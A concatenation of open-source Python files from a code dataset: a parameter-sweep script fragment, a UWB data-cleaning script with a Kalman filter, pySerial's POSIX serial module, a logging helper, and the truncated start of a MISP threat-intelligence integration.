#make directories for saving raw_outputs (ignore only the already-exists case)
try:
    os.makedirs("../../raw_output/EnvEq/"+f_name)
except FileExistsError:
    pass
#iterator over these
o2_lim_arr=np.empty([0,2])
for ulim_Tpro in np.arange(0.1,1,0.2):
for ulim_Tneg in np.arange(0.1,1,0.2):
o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0)
def solve_parm(u_lim_o2): #calls the solve_eq function with all default inputs other than o2_lim
f_name_i=f_name+"{:.1f}".format(u_lim_o2[0])+"-"+"{:.1f}".format(u_lim_o2[1])
lim[0,1,1]=u_lim_o2[0]
lim[0,2,1]=u_lim_o2[1]
ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i)
if __name__ == '__main__':
pool = Pool(4)
pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims
pool.close()
pool.join()
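#editor note: np.arange(0.1, 1, 0.2) yields [0.1, 0.3, 0.5, 0.7, 0.9], so
#o2_lim_arr holds the 25 (ulim_Tpro, ulim_Tneg) pairs that Pool(4) processes
#four at a time.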
---- [per-row numeric quality metrics and duplicated repo columns omitted] ----
---- next file: task1_makeTrainingDataset.py | repo: 1985312383/contest (also huxiaoyi0625/Mathematical_Modeling_Contest_E_2021) | hexsha: 866f56e685c4eea3f8e5c6a81ebbf185f955f32d | license(s): Apache-2.0 | size: 4,495 bytes ----
import csv
import re
import numpy as np
thre = 1.5  # tunable parameter: outlier threshold, in standard deviations
iteration_num = 2  # tunable parameter: number of outlier-removal iterations
def KalmanFilter(z, n_iter=20):
    # Kalman filter
    # assumes the state and measurement models A = 1, H = 1
    # initial parameters
sz = (n_iter,) # size of array
# Q = 1e-5 # process variance
Q = 1e-6 # process variance
# allocate space for arrays
xhat = np.zeros(sz) # a posteri estimate of x
P = np.zeros(sz) # a posteri error estimate
xhatminus = np.zeros(sz) # a priori estimate of x
Pminus = np.zeros(sz) # a priori error estimate
K = np.zeros(sz) # gain or blending factor
R = 0.015 ** 2 # estimate of measurement variance, change to see effect
    # initial guesses
xhat[0] = 0.0
P[0] = 1.0
A = 1
H = 1
for k in range(1, n_iter):
# time update
xhatminus[k] = A * xhat[k - 1] # X(k|k-1) = AX(k-1|k-1) + BU(k) + W(k),A=1,BU(k) = 0
Pminus[k] = A * P[k - 1] + Q # P(k|k-1) = AP(k-1|k-1)A' + Q(k) ,A=1
# measurement update
K[k] = Pminus[k] / (Pminus[k] + R) # Kg(k)=P(k|k-1)H'/[HP(k|k-1)H' + R],H=1
xhat[k] = xhatminus[k] + K[k] * (z[k] - H * xhatminus[k]) # X(k|k) = X(k|k-1) + Kg(k)[Z(k) - HX(k|k-1)], H=1
P[k] = (1 - K[k] * H) * Pminus[k] # P(k|k) = (1 - Kg(k)H)P(k|k-1), H=1
return xhat
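# Editor note: minimal usage sketch for KalmanFilter (hypothetical data); the
# filter assumes A = H = 1 as noted above and returns the a posteriori
# estimates:
#   z = np.random.normal(0.5, 0.1, 200)
#   xhat = KalmanFilter(z, n_iter=len(z))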
def data_process(file_path: str):
with open(file_path, "r") as f: # 打开文件
f.readline() # 去掉第一行
data = f.readlines() # 读取文件
data_num = len(data) / 4
if int(data_num) - data_num < -0.1:
raise ValueError("数据数量不对!")
initial_time = re.search(":.*:([0-9]*)", data[0], flags=0) # 获取初始数据序列
initial_time = int(initial_time.group(1))
Measures = []
for i in range(int(data_num)):
measure = []
for j in range(4):
device = []
anchor = re.search(":[0-9]*?:RR:0:([0-9]):[0-9]*?:([0-9]*?):[0-9]*?:([0-9]*)", data[4 * i + j], flags=0)
            device.extend([int(anchor.group(3)) - initial_time, anchor.group(1), anchor.group(2)])  # sample index, anchor (device) id, measured value
            device = list(map(int, device))
            measure.append(device)  # one "measure" is the four readings from the four anchors
Measures.append(measure)
    Measures = np.array(Measures)  # Measures is a 3-D array holding all acquired measurements
normalized_device_data = []
normalized_device_data_x = []
device_data = []
device_data_x = []
for i in range(4):
device_data.append(Measures[:, i, 2])
device_data_x.append(np.arange(len(Measures[:, i, 2])))
        normalized_device_data.append(device_data[i] / np.max(Measures[:, i, 2]))  # normalize by the maximum value
normalized_device_data_x = device_data_x
normalized_device_data = np.array(normalized_device_data)
normalized_device_data_x = np.array(normalized_device_data_x)
device_data = np.array(device_data)
device_data_x = np.array(device_data_x)
processed_device_data = np.array(device_data).copy()
device_mean = np.mean(device_data, axis=1)
device_std = np.std(device_data, axis=1)
    low_thre = device_mean - device_std * thre  # lower bound for outlier removal
    high_thre = device_mean + device_std * thre  # upper bound for outlier removal
for _ in range(iteration_num):
for i in range(4):
for j in range(len(device_data[i, :])):
if device_data[i, j] < low_thre[i] or device_data[i, j] > high_thre[i]:
processed_device_data[i, j] = device_mean[i]
xhat = []
for i in range(4):
# raw_data = device_data[i]
raw_data = processed_device_data[i]
xhat.append(KalmanFilter(raw_data, n_iter=len(raw_data)))
xhat = np.array(xhat)
    xhat = np.around(xhat, 1)  # round the four filtered series to one decimal place
    return device_data, xhat  # device_data: raw data; xhat: after outlier removal and Kalman filtering
def save_data(file_path: str, Measures):
with open(file_path, "w+", newline="") as datacsv:
        # dialect selects the CSV flavor (default is "excel"); a delimiter="\t" argument would change the field separator
        csvwriter = csv.writer(datacsv, dialect="excel")
        # write the header row, one list item per cell (writerows below appends the data rows)
        csvwriter.writerow(["Number", "A0", "A1", "A2", "A3"])
        csvwriter.writerows(np.column_stack((np.arange(Measures.shape[1]), Measures.T)))
def collect_dataset(kind):
for i in range(1, 325):
file_path = f"./data/附件1:UWB数据集/{kind}数据/{i}.{kind}.txt"
original_data, final_processed_data = data_process(file_path)
save_data(f"cleaned_data/{kind}数据/{i}.{kind}.csv", final_processed_data)
def collect_labels():
pass
if __name__ == '__main__':
collect_dataset("正常")
collect_dataset("异常")
---- [per-row numeric quality metrics and duplicated repo columns omitted] ----
---- next file: editing files/Portable Python 3.2.5.1/App/Lib/site-packages/serial/serialposix.py | repo: mattl1598/testing (also mattl1598/Project-Mochachino) | hexsha: 86720b27c369fdf8140425890d2127c46b5bc111 | license(s): Unlicense | size: 24,252 bytes ----
#!/usr/bin/env python
#
# Python Serial Port Extension for Win32, Linux, BSD, Jython
# module for serial IO for POSIX compatible systems, like Linux
# see __init__.py
#
# (C) 2001-2010 Chris Liechti <cliechti@gmx.net>
# this is distributed under a free software license, see license.txt
#
# parts based on code from Grant B. Edwards <grante@visi.com>:
# ftp://ftp.visi.com/users/grante/python/PosixSerial.py
#
# references: http://www.easysw.com/~mike/serial/serial.html
import sys, os, fcntl, termios, struct, select, errno, time
from .serialutil import *
# Do check the Python version as some constants have moved.
if (sys.hexversion < 0x020100f0):
import TERMIOS
else:
TERMIOS = termios
if (sys.hexversion < 0x020200f0):
import FCNTL
else:
FCNTL = fcntl
# try to detect the OS so that a device can be selected...
# this code block should supply a device() and set_special_baudrate() function
# for the platform
plat = sys.platform.lower()
if plat[:5] == 'linux': # Linux (confirmed)
def device(port):
return '/dev/ttyS%d' % port
ASYNC_SPD_MASK = 0x1030
ASYNC_SPD_CUST = 0x0030
def set_special_baudrate(port, baudrate):
import array
buf = array.array('i', [0] * 32)
# get serial_struct
FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf)
# set custom divisor
        buf[6] = buf[7] // baudrate  # integer division: the array holds C ints
# update flags
buf[4] &= ~ASYNC_SPD_MASK
buf[4] |= ASYNC_SPD_CUST
# set serial_struct
try:
res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf)
except IOError:
raise ValueError('Failed to set custom baud rate: %r' % baudrate)
baudrate_constants = {
        0: 0o000000,  # hang up
50: 0o000001,
75: 0o000002,
110: 0o000003,
134: 0o000004,
150: 0o000005,
200: 0o000006,
300: 0o000007,
600: 0o000010,
1200: 0o000011,
1800: 0o000012,
2400: 0o000013,
4800: 0o000014,
9600: 0o000015,
19200: 0o000016,
38400: 0o000017,
57600: 0o010001,
115200: 0o010002,
230400: 0o010003,
460800: 0o010004,
500000: 0o010005,
576000: 0o010006,
921600: 0o010007,
1000000: 0o010010,
1152000: 0o010011,
1500000: 0o010012,
2000000: 0o010013,
2500000: 0o010014,
3000000: 0o010015,
3500000: 0o010016,
4000000: 0o010017
}
elif plat == 'cygwin': # cygwin/win32 (confirmed)
def device(port):
return '/dev/com%d' % (port + 1)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat == 'openbsd3': # BSD (confirmed)
def device(port):
return '/dev/ttyp%d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:3] == 'bsd' or \
plat[:7] == 'freebsd' or \
plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d)
def device(port):
return '/dev/cuad%d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:6] == 'darwin': # OS X
version = os.uname()[2].split('.')
# Tiger or above can support arbitrary serial speeds
if int(version[0]) >= 8:
def set_special_baudrate(port, baudrate):
# use IOKit-specific call to set up high speeds
import array, fcntl
buf = array.array('i', [baudrate])
IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t)
fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1)
else: # version < 8
def set_special_baudrate(port, baudrate):
raise ValueError("baud rate not supported")
def device(port):
return '/dev/cuad%d' % port
baudrate_constants = {}
elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk
def device(port):
return '/dev/dty%02d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:4] == 'irix': # IRIX (partially tested)
def device(port):
return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:2] == 'hp': # HP-UX (not tested)
def device(port):
return '/dev/tty%dp0' % (port+1)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed)
def device(port):
return '/dev/tty%c' % (ord('a')+port)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:3] == 'aix': # AIX
def device(port):
return '/dev/tty%d' % (port)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
else:
# platform detection has failed...
sys.stderr.write("""\
don't know how to number ttys on this system.
! Use an explicit path (eg /dev/ttyS1) or send this information to
! the author of this module:
sys.platform = %r
os.name = %r
serialposix.py version = %s
also add the device name of the serial port and where the
counting starts for the first serial port.
e.g. 'first serial port: /dev/ttyS0'
and with a bit luck you can get this module running...
""" % (sys.platform, os.name, VERSION))
# no exception, just continue with a brave attempt to build a device name
# even if the device name is not correct for the platform it has chances
# to work using a string with the real device name as port parameter.
    def device(portnum):
        return '/dev/ttyS%d' % portnum
def set_special_baudrate(port, baudrate):
raise SerialException("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
#~ raise Exception, "this module does not run on this platform, sorry."
# whats up with "aix", "beos", ....
# they should work, just need to know the device names.
# load some constants for later use.
# try to use values from TERMIOS, use defaults from linux otherwise
TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415
TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416
TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417
TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418
#TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001
TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002
TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004
#TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008
#TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010
TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020
TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040
TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080
TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100
TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR
TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG
#TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000
#TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000
TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B
TIOCM_zero_str = struct.pack('I', 0)
TIOCM_RTS_str = struct.pack('I', TIOCM_RTS)
TIOCM_DTR_str = struct.pack('I', TIOCM_DTR)
TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427
TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428
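# Editor note: each 'hasattr(...) and ... or default' line above is the
# pre-2.5 conditional idiom and is equivalent to, e.g.:
#   TIOCMGET = getattr(TERMIOS, 'TIOCMGET', 0x5415)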
class PosixSerial(SerialBase):
"""Serial port class POSIX implementation. Serial port configuration is
done with termios and fcntl. Runs on Linux and many other Un*x like
systems."""
def open(self):
"""Open port with current settings. This may throw a SerialException
if the port cannot be opened."""
self.fd = None
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
# open
try:
self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK)
except Exception as msg:
self.fd = None
raise SerialException("could not open port %s: %s" % (self._port, msg))
#~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking
try:
self._reconfigurePort()
except:
try:
os.close(self.fd)
except:
# ignore any exception when closing the port
# also to keep original exception that happened when setting up
pass
self.fd = None
raise
else:
self._isOpen = True
#~ self.flushInput()
def _reconfigurePort(self):
"""Set communication parameters on opened port."""
if self.fd is None:
raise SerialException("Can only operate on a valid file descriptor")
custom_baud = None
vmin = vtime = 0 # timeout is done via select
if self._interCharTimeout is not None:
vmin = 1
vtime = int(self._interCharTimeout * 10)
try:
iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd)
except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here
raise SerialException("Could not configure port: %s" % msg)
# set up raw mode / no echo / binary
cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD)
lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL|
TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT
for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk
if hasattr(TERMIOS, flag):
lflag &= ~getattr(TERMIOS, flag)
oflag &= ~(TERMIOS.OPOST)
iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK)
if hasattr(TERMIOS, 'IUCLC'):
iflag &= ~TERMIOS.IUCLC
if hasattr(TERMIOS, 'PARMRK'):
iflag &= ~TERMIOS.PARMRK
# setup baud rate
try:
ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate))
except AttributeError:
try:
ispeed = ospeed = baudrate_constants[self._baudrate]
except KeyError:
#~ raise ValueError('Invalid baud rate: %r' % self._baudrate)
# may need custom baud rate, it isn't in our list.
ispeed = ospeed = getattr(TERMIOS, 'B38400')
try:
custom_baud = int(self._baudrate) # store for later
except ValueError:
raise ValueError('Invalid baud rate: %r' % self._baudrate)
else:
if custom_baud < 0:
raise ValueError('Invalid baud rate: %r' % self._baudrate)
# setup char len
cflag &= ~TERMIOS.CSIZE
if self._bytesize == 8:
cflag |= TERMIOS.CS8
elif self._bytesize == 7:
cflag |= TERMIOS.CS7
elif self._bytesize == 6:
cflag |= TERMIOS.CS6
elif self._bytesize == 5:
cflag |= TERMIOS.CS5
else:
raise ValueError('Invalid char len: %r' % self._bytesize)
# setup stopbits
if self._stopbits == STOPBITS_ONE:
cflag &= ~(TERMIOS.CSTOPB)
elif self._stopbits == STOPBITS_ONE_POINT_FIVE:
cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. there is no POSIX support for 1.5
elif self._stopbits == STOPBITS_TWO:
cflag |= (TERMIOS.CSTOPB)
else:
raise ValueError('Invalid stop bit specification: %r' % self._stopbits)
# setup parity
iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP)
if self._parity == PARITY_NONE:
cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD)
elif self._parity == PARITY_EVEN:
cflag &= ~(TERMIOS.PARODD)
cflag |= (TERMIOS.PARENB)
elif self._parity == PARITY_ODD:
cflag |= (TERMIOS.PARENB|TERMIOS.PARODD)
else:
raise ValueError('Invalid parity: %r' % self._parity)
# setup flow control
# xonxoff
if hasattr(TERMIOS, 'IXANY'):
if self._xonxoff:
iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY)
else:
iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY)
else:
if self._xonxoff:
iflag |= (TERMIOS.IXON|TERMIOS.IXOFF)
else:
iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF)
# rtscts
if hasattr(TERMIOS, 'CRTSCTS'):
if self._rtscts:
cflag |= (TERMIOS.CRTSCTS)
else:
cflag &= ~(TERMIOS.CRTSCTS)
elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name
if self._rtscts:
cflag |= (TERMIOS.CNEW_RTSCTS)
else:
cflag &= ~(TERMIOS.CNEW_RTSCTS)
# XXX should there be a warning if setting up rtscts (and xonxoff etc) fails??
# buffer
# vmin "minimal number of characters to be read. = for non blocking"
if vmin < 0 or vmin > 255:
raise ValueError('Invalid vmin: %r ' % vmin)
cc[TERMIOS.VMIN] = vmin
# vtime
if vtime < 0 or vtime > 255:
raise ValueError('Invalid vtime: %r' % vtime)
cc[TERMIOS.VTIME] = vtime
# activate settings
termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc])
# apply custom baud rate, if any
if custom_baud is not None:
set_special_baudrate(self, custom_baud)
def close(self):
"""Close port"""
if self._isOpen:
if self.fd is not None:
os.close(self.fd)
self.fd = None
self._isOpen = False
def makeDeviceName(self, port):
return device(port)
# - - - - - - - - - - - - - - - - - - - - - - - -
def inWaiting(self):
"""Return the number of characters currently in the input buffer."""
#~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str)
s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str)
return struct.unpack('I',s)[0]
# select based implementation, proved to work on many systems
def read(self, size=1):
"""Read size bytes from the serial port. If a timeout is set it may
           return fewer characters than requested. With no timeout it will block
until the requested number of bytes is read."""
if self.fd is None: raise portNotOpenError
read = bytearray()
while len(read) < size:
ready,_,_ = select.select([self.fd],[],[], self._timeout)
# If select was used with a timeout, and the timeout occurs, it
# returns with empty lists -> thus abort read operation.
# For timeout == 0 (non-blocking operation) also abort when there
# is nothing to read.
if not ready:
break # timeout
buf = os.read(self.fd, size-len(read))
# read should always return some data as select reported it was
# ready to read when we get to this point.
if not buf:
# Disconnected devices, at least on Linux, show the
# behavior that they are always ready to read immediately
# but reading returns nothing.
raise SerialException('device reports readiness to read but returned no data (device disconnected?)')
read.extend(buf)
return bytes(read)
def write(self, data):
"""Output the given string over the serial port."""
if self.fd is None: raise portNotOpenError
t = len(data)
d = data
if self._writeTimeout is not None and self._writeTimeout > 0:
timeout = time.time() + self._writeTimeout
else:
timeout = None
while t > 0:
try:
n = os.write(self.fd, d)
if timeout:
# when timeout is set, use select to wait for being ready
# with the time left as timeout
timeleft = timeout - time.time()
if timeleft < 0:
raise writeTimeoutError
_, ready, _ = select.select([], [self.fd], [], timeleft)
if not ready:
raise writeTimeoutError
d = d[n:]
t = t - n
except OSError as v:
if v.errno != errno.EAGAIN:
raise SerialException('write failed: %s' % (v,))
return len(data)
def flush(self):
"""Flush of file like objects. In this case, wait until all data
is written."""
self.drainOutput()
def flushInput(self):
"""Clear input buffer, discarding all that is in the buffer."""
if self.fd is None:
raise portNotOpenError
termios.tcflush(self.fd, TERMIOS.TCIFLUSH)
def flushOutput(self):
"""Clear output buffer, aborting the current output and
discarding all that is in the buffer."""
if self.fd is None:
raise portNotOpenError
termios.tcflush(self.fd, TERMIOS.TCOFLUSH)
def sendBreak(self, duration=0.25):
"""Send break condition. Timed, returns to idle state after given duration."""
if self.fd is None:
raise portNotOpenError
termios.tcsendbreak(self.fd, int(duration/0.25))
def setBreak(self, level=1):
"""Set break: Controls TXD. When active, no transmitting is possible."""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCSBRK)
else:
fcntl.ioctl(self.fd, TIOCCBRK)
def setRTS(self, level=1):
"""Set terminal status line: Request To Send"""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str)
else:
fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str)
def setDTR(self, level=1):
"""Set terminal status line: Data Terminal Ready"""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str)
else:
fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str)
def getCTS(self):
"""Read terminal status line: Clear To Send"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_CTS != 0
def getDSR(self):
"""Read terminal status line: Data Set Ready"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_DSR != 0
def getRI(self):
"""Read terminal status line: Ring Indicator"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_RI != 0
def getCD(self):
"""Read terminal status line: Carrier Detect"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_CD != 0
# - - platform specific - - - -
def drainOutput(self):
"""internal - not portable!"""
if self.fd is None: raise portNotOpenError
termios.tcdrain(self.fd)
def nonblocking(self):
"""internal - not portable!"""
if self.fd is None:
raise portNotOpenError
fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)
def fileno(self):
"""For easier use of the serial port instance with select.
WARNING: this function is not portable to different platforms!"""
if self.fd is None: raise portNotOpenError
return self.fd
def flowControl(self, enable):
"""manually control flow - when hardware or software flow control is
enabled"""
if enable:
termios.tcflow(self.fd, TERMIOS.TCION)
else:
termios.tcflow(self.fd, TERMIOS.TCIOFF)
# assemble Serial class with the platform specific implementation and the base
# for file-like behavior. For Python 2.6 and newer, which provide the new I/O
# library, derive from io.RawIOBase
try:
import io
except ImportError:
# classic version with our own file-like emulation
class Serial(PosixSerial, FileLike):
pass
else:
# io library present
class Serial(PosixSerial, io.RawIOBase):
pass
class PosixPollSerial(Serial):
"""poll based read implementation. not all systems support poll properly.
however this one has better handling of errors, such as a device
disconnecting while it's in use (e.g. USB-serial unplugged)"""
def read(self, size=1):
"""Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read."""
if self.fd is None: raise portNotOpenError
read = bytearray()
poll = select.poll()
poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL)
if size > 0:
while len(read) < size:
# print "\tread(): size",size, "have", len(read) #debug
# wait until device becomes ready to read (or something fails)
for fd, event in poll.poll(self._timeout*1000):
if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL):
raise SerialException('device reports error (poll)')
# we don't care if it is select.POLLIN or timeout, that's
# handled below
buf = os.read(self.fd, size - len(read))
read.extend(buf)
if ((self._timeout is not None and self._timeout >= 0) or
(self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf:
break # early abort on timeout
return bytes(read)
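# Usage sketch (device path and settings below are illustrative assumptions,
# not taken from this file): PosixPollSerial is a drop-in replacement for
# Serial on systems where poll() works reliably, e.g.
#   s = PosixPollSerial('/dev/ttyUSB0', baudrate=9600, timeout=1)
#   data = s.read(16)  # raises SerialException on POLLERR/POLLHUP/POLLNVAL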
if __name__ == '__main__':
s = Serial(0,
baudrate=19200, # baud rate
bytesize=EIGHTBITS, # number of data bits
parity=PARITY_EVEN, # enable parity checking
stopbits=STOPBITS_ONE, # number of stop bits
timeout=3, # set a timeout value, None for waiting forever
xonxoff=0, # enable software flow control
rtscts=0, # enable RTS/CTS flow control
)
s.setRTS(1)
s.setDTR(1)
s.flushInput()
s.flushOutput()
s.write(b'hello')
sys.stdout.write('%r\n' % s.read(5))
sys.stdout.write('%s\n' % s.inWaiting())
del s
| [record statistics and quality-signal columns omitted]
| hexsha: 867600e9a45eebd6cdfd857a6ba6c53cc063cb70 | size: 845 | ext: py | lang: Python
| path: retro_star/utils/logger.py | repo: cthoyt/retro_star | head: 280231eb2f5dffc0e14bed300d770977b323205a | licenses: ["MIT"]
| stars: 65 (2020-06-27 to 2022-03-30) | issues: 15 (2020-07-07 to 2022-03-22) | forks: 14 (2020-06-30 to 2022-03-30)
import logging
def setup_logger(fname=None, silent=False):
if fname is None:
logging.basicConfig(
level=logging.INFO if not silent else logging.CRITICAL,
format='%(name)-12s: %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filemode='w'
)
else:
logging.basicConfig(
level=logging.INFO if not silent else logging.CRITICAL,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename=fname,
filemode='w'
)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
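# Usage sketch (hypothetical caller, not part of the original module):
#   setup_logger('run.log')    # INFO and above go to run.log, mirrored to the console
#   setup_logger(silent=True)  # root level raised to CRITICAL, so INFO records are dropped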
| [record statistics and quality-signal columns omitted]
| hexsha: 86760e9869adb9d8e359c444118b7fb153ad2c74 | size: 63,014 | ext: py | lang: Python
| path: Packs/MISP/Integrations/MISPV3/MISPV3.py | repo: hiep4hiep/content | head: f609c4c9548fe2188e8e2e00b2c9e80a74e24427 | licenses: ["MIT"]
| stars: null | issues: 42 (2022-03-11 to 2022-03-31) | forks: null
# type: ignore
from typing import Union, List, Dict
from urllib.parse import urlparse
import urllib3
from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute
from pymisp.tools import GenericObjectGenerator
import copy
from pymisp.tools import FileObject
from CommonServerPython import *
logging.getLogger("pymisp").setLevel(logging.CRITICAL)
def handle_connection_errors(error):
if "SSLError" in error:
return_error('Unable to connect to MISP because of a SSLCertVerificationError, '
'Please try to use the Trust any certificate option.')
if "NewConnectionError" in error:
return_error('Unable to connect to MISP because of a NewConnectionError, '
'Please make sure your MISP server url is correct.')
if "Please make sure the API key and the URL are correct" in error:
return_error('Unable to connect to MISP, '
'Please make sure the API key is correct.')
return_error(error)
def warn(*args):
"""
Do nothing with warnings
"""
pass
# Disable requests warnings
urllib3.disable_warnings()
# Disable python warnings
warnings.warn = warn
''' GLOBALS/PARAMS '''
params = demisto.params()
if not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')):
raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.')
MISP_URL = params.get('url')
VERIFY = not params.get('insecure')
PROXIES = handle_proxy() # type: ignore
try:
PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)
except PyMISPError as e:
handle_connection_errors(e.message)
PREDEFINED_FEEDS = {
'CIRCL': {'name': 'CIRCL OSINT Feed',
'url': 'https://www.circl.lu/doc/misp/feed-osint',
'format': 'misp',
'input': 'network'},
'Botvrij.eu': {'name': 'The Botvrij.eu Data',
'url': 'http://www.botvrij.eu/data/feed-osint',
'format': 'misp',
'input': 'network'}
}
THREAT_LEVELS_TO_ID = {
'High': 1,
'Medium': 2,
'Low': 3,
'Unknown': 4
}
MISP_ENTITIES_TO_CONTEXT_DATA = {
'deleted': 'Deleted',
'category': 'Category',
'comment': 'Comment',
'uuid': 'UUID',
'sharing_group_id': 'SharingGroupID',
'timestamp': 'LastChanged',
'to_ids': 'ToIDs',
'value': 'Value',
'event_id': 'EventID',
'ShadowAttribute': 'ShadowAttribute',
'disable_correlation': 'DisableCorrelation',
'distribution': 'Distribution',
'type': 'Type',
'id': 'ID',
